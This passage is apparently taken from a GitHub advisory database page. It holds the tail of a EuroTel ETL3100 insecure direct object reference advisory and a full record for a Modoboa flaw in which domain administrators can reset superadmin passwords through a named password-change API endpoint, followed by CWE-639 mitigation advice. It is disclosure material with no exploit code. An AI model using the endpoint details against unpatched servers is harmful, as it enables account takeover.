"details": "\n\n\n\n\nEuroTel ETL3100 versions v01c01 and v01x37 are vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization, access the hidden resources on the system, and execute privileged functionalities.\n\n\n\n\n\n\n\n",
"id": "GHSA-c3jv-hpf4-4rpw",
"modified": "2023-12-20T00:32:44Z",
"published": "2023-12-20T00:32:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6929"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-05"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C3QP-4QXM-FWHR
Vulnerability from github – Published: 2026-06-29 18:31 – Updated: 2026-06-29 18:31Modoboa before 2.9.0 contains an insecure direct object reference vulnerability in the PUT /api/v1/accounts/{pk}/password/ endpoint that allows domain administrators to change any user's password. Attackers with domain admin privileges can bypass object-level access controls to reset superadmin passwords and achieve full account takeover.
{
"affected": [],
"aliases": [
"CVE-2026-56780"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-29T18:16:38Z",
"severity": "HIGH"
},
"details": "Modoboa before 2.9.0 contains an insecure direct object reference vulnerability in the PUT /api/v1/accounts/{pk}/password/ endpoint that allows domain administrators to change any user\u0027s password. Attackers with domain admin privileges can bypass object-level access controls to reset superadmin passwords and achieve full account takeover.",
"id": "GHSA-c3qp-4qxm-fwhr",
"modified": "2026-06-29T18:31:55Z",
"published": "2026-06-29T18:31:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56780"
},
{
"type": "WEB",
"url": "https://github.com/modoboa/modoboa/pull/4038"
},
{
"type": "WEB",
"url": "https://github.com/modoboa/modoboa/commit/a1878c4920a6e47c3217c6ff1ed4a8753c202661"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/modoboa-insecure-direct-object-reference-in-account-password-change-api"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.
Mitigation
Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.
Mitigation
Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.
No CAPEC attack patterns related to this CWE.